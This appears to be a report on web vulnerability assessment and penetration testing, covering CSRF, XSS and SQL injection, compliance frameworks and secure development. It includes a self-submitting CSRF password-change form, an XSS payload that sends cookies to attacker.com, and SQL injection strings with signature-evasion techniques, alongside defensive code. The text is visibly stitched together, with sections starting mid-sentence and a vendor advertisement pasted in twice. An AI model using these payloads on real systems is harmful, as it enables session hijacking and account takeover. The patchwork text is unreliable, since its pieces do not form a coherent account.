9. The penetration tester holds no responsibility for loss and/or damage that occurs if a real attack takes place during the testing period. If a real attack occurs during the testing period, the tester holds no responsibility for that attack; however, if the attack occurred as a result of an information leak from the tester, then the tester is responsible for the damage.
Vulnerability Assessment: The First Steps

There are a number of reasons an organization may need to conduct a vulnerability assessment. It could be simply a check-up on the overall web security risk posture; it could be part of PCI DSS requirements; or the scope could be the web security of a single, ready-to-be-deployed application. If an organization has more than a handful of applications and a number of servers, a vulnerability assessment of such a large scope could be overwhelming, so the first thing to decide is which applications need to be assessed, and why.

Web Application Vulnerability Types

For detecting web application vulnerabilities, we choose the following as our primary vulnerability detection targets:
1. Cross-Site Request Forgery (CSRF)
2. SQL Injection (SQLI)
3. Cross-Site Scripting (XSS)
for two reasons: a) they exist in many web applications, and b) their avoidance and detection are still considered difficult. Below we give a brief description of each vulnerability, followed by our proposed detection and prevention models.
CSRF Detection
The web application offers messaging between users. Upon login it sets a large, unpredictable session ID cookie, which is used to authenticate further requests by users. One of the features of the website is that users can send each other links inside their text messages. It uses HTTPS to keep messages, credentials, and session identifiers secret from network eavesdroppers. An incoming-messages frame is displayed to users who have logged in. This frame uses JavaScript or a refresh tag to execute the 'Check for new messages' action every 10 seconds on behalf of the user. New
messages appear in this frame, and include the name of the sender and the text of the message. Text that is formatted as an HTTP or HTTPS URL is automatically converted into a link. The 'Send a message' action takes two parameters: the recipient (a user name or 'all'), and the message itself, which is a short string. To determine whether this application is susceptible to CSRF, examine the 'Send a message' action (although the 'Logout' action is also sensitive and might be targeted by attackers for exploitation). When we do this, we find that the following simple HTML form is submitted to send messages:

<form action="GoatChatMessageSender" method="GET">
  <INPUT type="radio" value="Bob" name="Destination">Bob<BR>
  <INPUT type="radio" name="Destination" value="Alice">Alice<BR>
  <INPUT type="radio" name="Destination" value="Malory">Malory<BR>
  <INPUT type="radio" name="Destination" value="All">All<BR>
  Message: <input type="text" name="message" value="" /> <br>
  <input type="submit" name="Send" value="Send Message" />
</form>

From looking at this form we can figure out that when a user wishes to send the message 'Hi Alice' to Alice, a corresponding GET URL will be fetched when the user clicks 'Send Message'.

Hidden Form Based CSRF Exploit

This is the exploitation of a system which allows password changes but does not require the user's old password. In this example the target servlet requires an HTTP POST, and the attacker creates a self-submitting form to fulfill this requirement. Note that this exploit is not as reliable as an image-based request, because the user's browser (or at least the tiny frame this exploit is placed in) is actually directed to the targeted site. Users with browser scripting disabled won't be exploited and, depending on the user's browser and configuration, form submissions to other sites may result in a security popup box.

<HTML>
<BODY>
<form method="POST" id="evil" name="evil" action="https://www.yahoo.com/VictimApp/PasswordChange">
  <input type=hidden name="newpass" value="badguy">
</form>
<script>document.evil.submit()</script>
</BODY>
</HTML>

Even if scripting is disabled, however, a 'close this window' link that is actually a submit button may trick a user into submitting the form on the attacker's behalf.
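Detection of this weakness can be partly automated. The sketch below is a minimal heuristic, not a complete detector: it fetches a page, parses its forms with Python's standard library, and flags any form whose hidden fields contain nothing resembling an anti-CSRF token. The URL and the token-name hints are assumptions for illustration; the GoatChat form shown above would be flagged, since it carries no token at all.

# Heuristic CSRF check: fetch a page, find its forms, and flag any
# form that lacks a hidden anti-CSRF-token-like field. Sketch only;
# the URL below is a hypothetical stand-in for the demo application.
from html.parser import HTMLParser
from urllib.request import urlopen

TOKEN_HINTS = ("csrf", "token", "nonce")   # assumed naming conventions

class FormAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms = []          # list of (action, hidden_field_names)
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = (attrs.get("action") or "?", [])
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "hidden":
                self._current[1].append((attrs.get("name") or "").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

html = urlopen("https://example.test/GoatChat").read().decode()
auditor = FormAuditor()
auditor.feed(html)
for action, hidden in auditor.forms:
    if not any(hint in name for name in hidden for hint in TOKEN_HINTS):
        print(f"possible CSRF: form '{action}' has no token-like hidden field")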
INSERT permission on the table: even if the table is mentioned only in a SELECT sub-query of an INSERT statement, we will discover and flag the violation.
Architected as plug & play software, dotDefender provides optimal out-of-the-box protection against SQL Injection attacks, cross-site scripting, website defacement and many other web attack techniques. The reasons dotDefender offers such a comprehensive solution to your web application security needs are:
- Enterprise-class security against known and emerging hacking attacks
- Solutions for Hosting, Enterprise and SMB/SME
- Supports multiple platforms and technologies - IIS, Apache, Cloud ...
- Central management console for easy control over multiple dotDefender installations
- Open API for integration with management platforms and other applications
malicious hacker, it was delivered to the browser on behalf of the Web application. Such scripts can therefore be used to read the Web application's cookies and to break through its security mechanisms.
DOM-based XSS
DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript. The name refers to the standard model for representing HTML or XML content, the Document Object Model (DOM). JavaScript programs manipulate the state of a web page and populate it with dynamically computed data primarily by acting upon the DOM. A typical example is a piece of JavaScript accessing and extracting data from the URL via the location.* DOM properties, or receiving raw non-HTML data from the server via XMLHttpRequest, and then using this information to write dynamic HTML without proper escaping, entirely on the client side.

Example attack scenario: the application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the CC parameter in their browser to:

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

This causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session. Note that attackers can also use XSS to defeat any CSRF defense the application might employ.
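The fix is to escape untrusted data before writing it into HTML. As a minimal sketch (in Python rather than the servlet code above), the snippet below rebuilds the vulnerable line and contrasts it with an escaped version; html.escape neutralizes the quote and angle-bracket characters the payload depends on.

# Contrast: building the HTML snippet from the example with and without
# output escaping. html.escape neutralizes the characters (' " < > &)
# that the injected <script> payload relies on.
from html import escape

cc = "'><script>document.location='http://www.attacker.com/" \
     "cgi-bin/cookie.cgi?'%20+document.cookie</script>"

vulnerable = "<input name='creditcard' type='TEXT' value='" + cc + "'>"
safe = "<input name='creditcard' type='TEXT' value='" + escape(cc, quote=True) + "'>"

print(vulnerable)  # the browser would execute the injected script
print(safe)        # the browser renders the payload as inert text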
and trusted pages that contain ActiveX controls, Java applets, Flash scripts, and JavaScript are carefully chosen as crawl targets. As they are crawled, normal behavior is studied and recorded. Our results reveal that during start-up, Microsoft Internet Explorer (IE):
1. Locates temporary directories.
2. Writes temporary data into the registry.
3. Loads favourite links and history lists.
4. Loads the required DLL and font files.
5. Creates named pipes for internal communication.
During page retrieval and rendering, IE:
1. Checks registry settings.
2. Writes files to the user's local cache.
3. Loads a cookie index if a page contains cookies.
4. Loads corresponding plug-in executables if a page contains plug-in scripts.
Cookie Security
Other imperfect methods for cross-site scripting mitigation are also commonly used. One example is the use of additional security controls when handling cookie-based user authentication. Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal them. To mitigate this particular threat (though not the XSS problem in general), many web applications tie session cookies to the IP address of the user who originally logged in, and only permit that IP to use that cookie. This is effective in most situations (if an attacker is only after the cookie), but obviously breaks down in situations where an attacker spoofs their IP address, is behind the same NATed IP address or web proxy, or simply opts to tamper with the site or steal data through the injected script instead of attempting to hijack the cookie for future use.
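A minimal sketch of the IP-binding control described above, with the server-side session store reduced to a dictionary purely for illustration:

# Tying a session cookie to the client IP observed at login.
import secrets

sessions = {}  # session_id -> IP recorded at login

def login(client_ip):
    sid = secrets.token_hex(32)        # large, unpredictable session ID
    sessions[sid] = client_ip
    return sid

def authorize(sid, client_ip):
    # Reject the cookie if it arrives from a different IP than the login.
    # Note the limitations discussed above: shared NAT/proxy IPs collide,
    # and an injected script still runs from the victim's own IP.
    return sessions.get(sid) == client_ip

sid = login("203.0.113.7")
print(authorize(sid, "203.0.113.7"))   # True: same IP as login
print(authorize(sid, "198.51.100.9"))  # False: cookie replayed elsewhere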
Many operators of particular web applications (e.g. forums and webmail) wish to allow users to utilize some of the features HTML provides, such as a limited subset of HTML markup. When accepting HTML input from users (say, <b>very</b> large), output encoding (such as &lt;b&gt;very&lt;/b&gt; large) will not suffice, since the user input needs to be rendered as HTML by the browser (so it shows as "very large" in bold, instead of "<b>very</b> large"). Stopping XSS when accepting HTML input from users is much more complex in this situation: untrusted HTML input must be run through an HTML policy engine to ensure that it does not contain XSS.
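A toy allowlist "policy engine" illustrates the principle: a small set of harmless tags is kept, everything else is stripped or escaped. Production systems should rely on a maintained sanitizer library; the tag allowlist here is an assumption for illustration.

# Toy allowlist policy engine: keep a few harmless tags, drop all
# attributes, and escape everything else. Illustration only.
from html import escape
from html.parser import HTMLParser

ALLOWED = {"b", "i", "em", "strong"}   # assumed allowlist; no attributes

class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__()
        self.out = []

    def handle_starttag(self, tag, attrs):
        # Attributes are dropped even on allowed tags (onclick=... etc.).
        self.out.append(f"<{tag}>" if tag in ALLOWED else "")

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>" if tag in ALLOWED else "")

    def handle_data(self, data):
        self.out.append(escape(data))

def sanitize(html_in):
    s = Sanitizer()
    s.feed(html_in)
    return "".join(s.out)

print(sanitize("<b>very</b> large"))   # kept: <b>very</b> large
print(sanitize("<script>alert(1)</script><b onclick=x>hi</b>"))
# script tags stripped (their text remains as inert data),
# onclick attribute dropped: alert(1)<b>hi</b>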
Exploited XSS vulnerabilities can lead to:
- User accounts being stolen through session hijacking (stealing cookies) or through the theft of username and password combinations
- The ability for attackers to track your visitors' web browsing behavior, infringing on their privacy
- Abuse of credentials and trust
- Keystroke logging of your site's visitors
- Misuse of server and bandwidth resources
- The ability for attackers to exploit your visitors' browsers
- Data theft
- Web site defacement and vandalism
- Link injections
- Content theft
Web sites that have been exploited using XSS attacks have also been used to:
- Probe the rest of the intranet for other vulnerabilities
- Launch Denial of Service attacks
- Launch Brute Force attacks
Architected as plug & play software, dotDefender provides optimal out-of-the-box protection against cross-site scripting, SQL Injection attacks, path traversal and many other web attack techniques. The reasons dotDefender offers such a comprehensive solution to your web application security needs are:
- Easy installation on Apache and IIS servers
- Strong security against known and emerging hacking attacks
- Best-of-breed predefined security rules for instant protection
- Interface and API for managing multiple servers with ease
- Requires no additional hardware, and easily scales with your business
If the attack was successful, the attacker will often replicate it on other sites to increase the potential reward.
Successful attacks can result in:
- Changes to or deletion of highly sensitive business information
- Theft of customer information such as social security numbers, addresses, and credit card numbers
- Financial losses
- Brand damage
- Theft of intellectual property
- Legal liability and fines
Common SQL injection techniques include:
- Terminating queries using quotes, double-quotes, or SQL comments
- Using stored procedures
- Database manipulation commands such as TRUNCATE and DROP
- Using CASE WHEN and EXEC to run nested queries
- Utilizing SQL injection to create buffer overflow attacks within the database server
- Delivering SQL queries via XML and Web Services
- Blindfolded SQL injection techniques:
  o Blindfolded injection techniques using Boolean queries and WAITFOR DELAY
  o Comparison queries using commands such as BETWEEN, LIKE, ISNULL
- IDS signature evasive SQL injection techniques:
  o Using CONVERT and CAST commands to mask the attack payload
  o Using null bytes to break the signature pattern
  o Using HEX encoding mixtures
  o Using SQL CHAR() to represent ASCII values as numbers
For example, the attacker decides to go with a basic attack using: 1=1--. When this is entered into an input box, the server recognizes 1=1 as a true statement and, since -- marks the start of a comment, everything after it is ignored, making it possible for the attacker to gain access to the database.
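The standard defence is to keep user input out of the SQL text altogether. The sketch below, using Python's built-in sqlite3 module, shows the same always-true payload succeeding against a concatenated query and failing against a parameterized one.

# The 1=1 trick only works when user input is pasted into the SQL text.
# Parameterized queries keep input as data, so the same payload fails.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

payload = "' OR 1=1 --"   # classic always-true injection payload

# Vulnerable: string concatenation turns the payload into SQL logic.
query = "SELECT * FROM users WHERE name = '" + payload + "'"
print(conn.execute(query).fetchall())             # returns every row

# Safe: the driver binds the payload as a literal value.
safe = "SELECT * FROM users WHERE name = ?"
print(conn.execute(safe, (payload,)).fetchall())  # returns no rows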
The threat posed by SQL injection attacks is not solitary. Combined with other vulnerabilities such as cross-site scripting, path traversal, denial of service attacks, and buffer overflows, the need for web site owners and administrators to be vigilant is not only important but overwhelming.
Cleaning Up
The cleaning-up process is done to clear any mess that has been made as a result of the penetration test. A detailed and exact list of all actions performed during the penetration test must be kept; this is vital so that any cleaning up of the system can be done. The cleaning up of compromised hosts must be done securely and without affecting the organization's normal operations, and the process should be verified by the organization's staff to ensure that it has been done successfully. Bad practices and improperly documented actions during a penetration test will leave the cleaning-up process as a backup-and-restore job for the organization, affecting normal operations and taking up its IT resources. A good example of a clean-up task is the removal of user accounts created on a system during the penetration test. It is always the penetration tester's responsibility to inform the organization about the changes that exist in the system as a result of the penetration test, and to clean them up.
Even if the penetration team did not manage to break into the organization, this does not mean that it is secure. Penetration testing is not the best way to find all vulnerabilities: vulnerability assessments that include careful diagnostic reviews of all servers and network devices will identify more issues faster than a "black box" penetration test. Penetration tests are conducted in a limited time period, which means they are a "snapshot" of a system or network's security. As such, testing is limited to known vulnerabilities and the current configuration of the network. Just because the penetration test was unsuccessful today does not mean a new weakness will not be posted on Bugtraq and exploited in the near future. And even if the testing team did not discover any vulnerability in the organization's systems, it does not mean that hackers or intruders will not.

As business has transformed over the years to a more service-oriented environment, a significant increase in trust has been placed on outside organizations to manage business processes and corporate data. Do you truly know how secure your third-party service providers' networks and/or web applications are? What about your own network or web applications? Data breaches are occurring at an all-time high. Increased awareness of network security at the C level is also helping IT departments to increase their budgets and move their requests to the top of every corporation's annual budget. The need for accessible on-demand data used in real-time decision making, and the increased focus on business efficiencies, has resulted in vital and confidential data being accessed, stored, and transferred electronically across corporate networks and the internet. Attempted breaches occur every day through the use of automated bots and targeted attacks, but without proper testing, how do you know whether your business, or a third-party service provider of yours, is susceptible to attack?
Testing commonly uncovers issues such as:
- Delays in patching security flaws of operating systems and software
- Use of insecure access protocols
- Lapses in licensing for antivirus, IDS, IPS, and other vulnerability identification and prevention tools
- Weak passwords for firewalls and other exposed services
- A loose software management policy
- Weak secure coding guidelines and QA review processes
- Lapses in IT Management's adherence to security controls and protocols
All of these issues are preventable by ensuring that a proper security maintenance program, with sufficient resources dedicated to its execution, is in place. A regularly scheduled external and/or internal vulnerability assessment can serve to validate the operation of current security practices and identify new issues that may have been introduced as a result of an upgrade or system change.
Regulatory Compliance
Software as a Service (SaaS) offerings, application service providers, third-party colocation/hosting facilities, and especially corporate networks have become prime targets for hackers, with the number of incidents increasing yearly, as they are treasure troves of confidential and business data targeted by criminals. This has elevated the importance of IT security in the enterprise and within various compliance and regulatory frameworks.
Recognized frameworks include, at minimum, requirements that a regular vulnerability assessment of the production network and/or web application be performed. Depending upon your environment, the following frameworks potentially require these assessments:
- Sarbanes-Oxley (SOX)
- Statements on Standards for Attestation Engagements 16 (SSAE 16 / SOC 1)
- Service Organization Controls (SOC) 2 / 3
- Payment Card Industry Data Security Standard (PCI DSS)
- Health Insurance Portability and Accountability Act (HIPAA)
- Gramm-Leach-Bliley Act (GLBA)
- Federal Information System Controls Audit Manual (FISCAM)
Typical issues uncovered by a vulnerability assessment include:
- Inappropriate SSL certificates (expired, not properly configured, self-signed, etc.)
- Unknown or unnecessarily open shares
- Dormant user accounts that have not expired
- Unnecessarily open ports
- Rogue devices connected to your systems
- Dangerous script configurations
- Servers allowing the use of dangerous protocols
- Incorrect permissions on important system files
- Running of unnecessary, potentially dangerous services
- Default passwords in use
- Unpatched services / applications
Key questions for an organization's leadership include:
- How is our executive leadership informed about the current level and business impact of cyber risks to our company?
- What is the current level and business impact of cyber risks to our company?
- What is our plan to address identified risks?
- How does our cyber security program apply industry standards and best practices?
- How many and what types of cyber incidents do we detect in a normal week?
- What is the threshold for notifying our executive leadership?
- How comprehensive is our cyber incident response plan? How often is it tested?
Penetration testing is an important part of a company's defence against cyber attacks; it may also be referred to as ethical hacking. It is a means to check that systems, buildings and people are secure by simulating criminal attacks. Penetration testing should reflect a measured approach to risk: think of things from a criminal's point of view. How much time, effort and money would criminals invest to gain access to your assets? How much time, effort and money are YOU willing to invest to ensure they can't?
Successful cyber attacks result in brand damage, financial loss and recovery costs. It is important to ensure your organization is, and remains, resilient to such attacks.
It is helpful to take an asset-centric point of view and focus on defending the assets or data that matter most to your company. Pentesters usually take the following approach:
- Scoping: where are your assets, what are they, and who can access them?
- Gap Analysis: what are the strengths and weaknesses in your organisation?
- Risk Assessment: how likely are your gaps to become targets?
- Penetration Test Scoping: what test plan, when executed, will give your company assurance that systems are secure?
- Remediation: following a test, how are issues addressed?
- Improvement: what policies and processes can be fixed so issues do not recur?
A good penetration testing firm will be able to guide you through this and ensure you select the right balance of cost, risk and security. There is nothing worse than undergoing year-on-year penetration testing only to find the same issues. Pen testers want to see their clients develop and improve their security postures, not remain targets.
It is not difficult to see a business being brought to its knees by what appears to be an innocuous theft or other lapse in security. It is crucial that businesses put good holistic security measures in place. These should include physical, personnel and information security measures. However, for them to be effective they should be regularly tested to ensure they are appropriate and proportionate to the threat. Independent commercial physical penetration tests are an ideal means of checking that the security measures work as intended.
Reputational Analysis
The most secure infrastructures in the world are still subject to the threat of deliberate or negligent human activity, and whilst human error can never be truly eliminated, your resilience against intelligence-gathering activities can be measured through a social engineering assessment, which typically includes:
a. Using telephony systems to gain potentially sensitive information from employees.
b. Using social media sites to gain employee trust.
c. Posing as a customer, senior manager or trusted third party to glean information.
Furthermore, a degree of sensitive information may also be available on publicly available websites (a very high-level example being Google), attacks may be being planned against you via IRC channels, and employees may be breaching confidentiality clauses by knowingly or unknowingly releasing sensitive information about your company.

Source Code Review is an essential part of best-practice software security and also of compliance regulations such as PCI DSS and PA DSS. It helps to eliminate serious software flaws that might lead to instability or affect the integrity of data. We provide both static and dynamic testing of source code, to ensure applications offer a high level of protection of confidential data and meet ever stricter compliance requirements, verifying that your code complies with the OWASP Top 10 and is not prone to:
- Unvalidated input
- Broken access control (for example, malicious use of user IDs)
- Broken authentication and session management (use of account credentials and session cookies)
- Cross-site scripting (XSS) attacks
- Buffer overflows
- Injection flaws (for example, structured query language (SQL) injection)
- Improper error handling
- Insecure storage
- Denial of service
- Insecure configuration management
A source code review service should be able to:
a) Eliminate the risk of SQL injection, XSS and CSRF style attacks
b) Analyse millions of lines of code across multiple modules
c) Interpret security flaws in a wide range of languages, including C and its derivatives, ASP, ASP.NET, Visual Basic, VB.NET, C#, Java, Perl, Python, PHP and Delphi
d) Pinpoint vulnerabilities and provide precise, detailed remediation advice for rapid fixes
e) Identify design areas and recommend best practice
f) Advise on countermeasures such as Web Application Firewalls
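As a flavour of what the static side of such a review automates, the toy Python sketch below greps source files for SQL that appears to be built by string concatenation. The regular expressions are deliberately crude assumptions; real review tools parse the code and track data flow rather than matching line patterns.

# Toy static check: flag lines that contain a SQL keyword and also
# appear to splice a string literal together with + concatenation.
# Real source code review tools do full parsing and data-flow analysis.
import re
import sys

SQL_KEYWORD = re.compile(r"\b(SELECT|INSERT|UPDATE|DELETE)\b", re.IGNORECASE)
CONCAT = re.compile(r"""["']\s*\+|\+\s*["']""")   # quote next to a plus sign

def scan_file(path):
    findings = []
    with open(path, encoding="utf-8", errors="replace") as f:
        for lineno, line in enumerate(f, start=1):
            if SQL_KEYWORD.search(line) and CONCAT.search(line):
                findings.append((lineno, line.strip()))
    return findings

if __name__ == "__main__":
    for path in sys.argv[1:]:
        for lineno, line in scan_file(path):
            print(f"{path}:{lineno}: possible concatenated SQL: {line}")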
Secure software practice spans the full lifecycle:
- Secure Software Concepts: security implications in software development and for software supply chain integrity
- Secure Software Requirements: capturing security requirements in the requirements-gathering phase
- Secure Software Design: translating security requirements into application design elements
- Secure Software Implementation/Coding: unit testing for security functionality and resiliency to attack, and developing secure code and exploit mitigation
- Secure Software Testing: testing for security functionality and resiliency to attack
- Software Acceptance: security implications in the software acceptance phase
- Software Deployment, Operations, Maintenance and Disposal: security issues around steady-state operations and management of software
This provides:
- A holistic approach to software security needs
- Advice regarding designing, developing and deploying secure software
- Knowledge of the latest software security technologies
- Assurance of compliance with regulations
- Compliance with your set of policies and procedures
Confidentiality, integrity, availability, authentication, authorization and auditing, the core tenets of security, must become requirements in your Software Development Lifecycle. Without this level of commitment, information is placed at risk. Incorporating security early, and maintaining it throughout all the different phases of the Software Development Lifecycle, has proven to be 30 to 100 times less expensive, and incalculably more effective, than the release-and-patch methodology frequently used today.
CHAPTER 5 CONCLUSION
Organizations that bear network security risk should engage in an ongoing vulnerability management program. A vulnerability management program includes ongoing vulnerability assessments, ongoing vulnerability remediation, and risk measurements. When the vulnerability management program's measurements provide a given level of confidence, it is then time to test the security assertions and perform a penetration test. An organization should only engage in a penetration test once it is confident that what it wants tested is secure. If your organization does not have a vulnerability management program, there is no sense in taking the test. Before a student takes a test, the student must prepare. The great Master Kan once said to his student: "When you can take the pebble from my hand, it will be time for you to leave." Similarly, when the vulnerability management program's measurements indicate that one is secure, it is time for the test.